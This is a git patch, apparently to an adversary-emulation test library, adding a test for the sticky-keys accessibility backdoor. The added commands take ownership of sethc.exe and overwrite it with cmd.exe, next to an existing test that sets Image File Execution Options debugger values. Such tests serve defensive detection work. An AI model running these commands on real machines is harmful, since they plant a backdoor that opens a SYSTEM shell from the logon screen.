From 91ea164b8e4d34bf0e0f7b1967993c7fdd5bc28a Mon Sep 17 00:00:00 2001
From: P4T12ICK <patrickbareiss1989@gmail.com>
Date: Fri, 27 Nov 2020 22:13:05 +0100
Subject: [PATCH] new atomic (#1298)

Co-authored-by: P4T12ICK <pbareib@splunk.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1546.008/T1546.008.yaml | 19 +++++++++++++++++--
 1 file changed, 17 insertions(+), 2 deletions(-)

diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index 4ddefabb..fda9c6b0 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -25,7 +25,7 @@ atomic_tests:
       $input_table = "#{parent_list}".split(",")
       $Name = "Debugger"
       $Value = "#{attached_process}"
-      Foreach ($item in $input_table){   
+      Foreach ($item in $input_table){
         $item = $item.trim()
         $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
         IF(!(Test-Path $registryPath))
@@ -47,4 +47,19 @@ atomic_tests:
       }
     name: powershell
     elevation_required: true
-
+- name: Replace binary of sticky keys
+  auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
+  description: |
+    Replace sticky keys binary (sethc.exe) with cmd.exe
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+      takeown /F C:\Windows\System32\sethc.exe /A
+      icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+    name: command_prompt
+    elevation_required: true